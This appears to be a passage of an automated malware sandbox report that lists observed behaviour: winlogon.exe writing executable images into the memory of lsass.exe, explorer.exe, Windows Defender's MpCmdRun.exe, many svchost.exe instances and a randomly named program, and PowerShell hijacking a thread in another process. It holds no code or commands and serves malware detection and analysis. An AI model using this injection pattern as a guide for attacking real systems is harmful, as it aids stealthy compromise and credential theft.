        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\more.com base: 234FE4F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2693C0E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 1AAD1C40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A42C600000 value starts with: 4D5AJump to behavior
        Injects code into the Windows Explorer (explorer.exe)
        Source: C:\Windows\System32\winlogon.exeMemory written: PID: 496 base: 7F20000 value: 4DJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 6304Jump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\winlogon.exe base: 1B9277D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\lsass.exe base: 2158AEB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E89FDC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dwm.exe base: 1F088910000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1AC86F40000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 14785F80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1DC59CE0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 16588B90000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 17A8CDB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1F34D880000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 220C26D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 25AF1E60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27BFF5C0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1CEE0560000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1B12B360000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1D16AC90000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 244678A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 183B0DA0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1805B940000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 191051C0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD35360000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21C3D9B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 12411140000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2D66E190000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 25F19560000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1BCA63A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E8FB3B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1F30F940000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 19CDA5A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\spoolsv.exe base: 6E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1A5F41B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27B14120000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1BCB8350000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 17A379A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 250F1D60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 11DEF540000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 23B351A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA9F190000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1D56C5D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E5CF260000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1B558CB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 17A21740000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 20FA22F0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD4E000000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\sihost.exe base: 17B78700000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 22EB7B30000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 210A8A00000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2B28DE00000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 157ABEB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\ctfmon.exe base: 25BB8540000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E697F40000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\explorer.exe base: 7F20000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 15C57B50000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2B9EF760000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dasHost.exe base: 24C894C0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21F961C0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C81BC40000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2904A8A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 2436BB30000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\smartscreen.exe base: 172339F0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 26FA2F80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25BE2B30000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 272D8A60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8FBBC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1CF2A9B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20537200000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 1E3C3A90000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 29B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 20E40470000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 238A9A60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AE0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1040000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1480000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: DB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1300000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B90000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 3040000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B30000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: D10000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 22A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AD0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2EB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2700000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2400000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 8A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2A50000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 3010000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 980000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: D80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1150000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2350000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2980000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: F30000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: C60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 7D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2610000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1380000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2200000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DA0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 24B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 930000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 12D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 6F0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 26F0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11C0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2240000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: CB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 780000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: ED0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1FD0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2400000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 7E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2D50000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 26F0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 14E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 9E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: EF0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 12A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1200000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: ED0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B10000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 860000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2AD0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2EA0000Jump to behavior
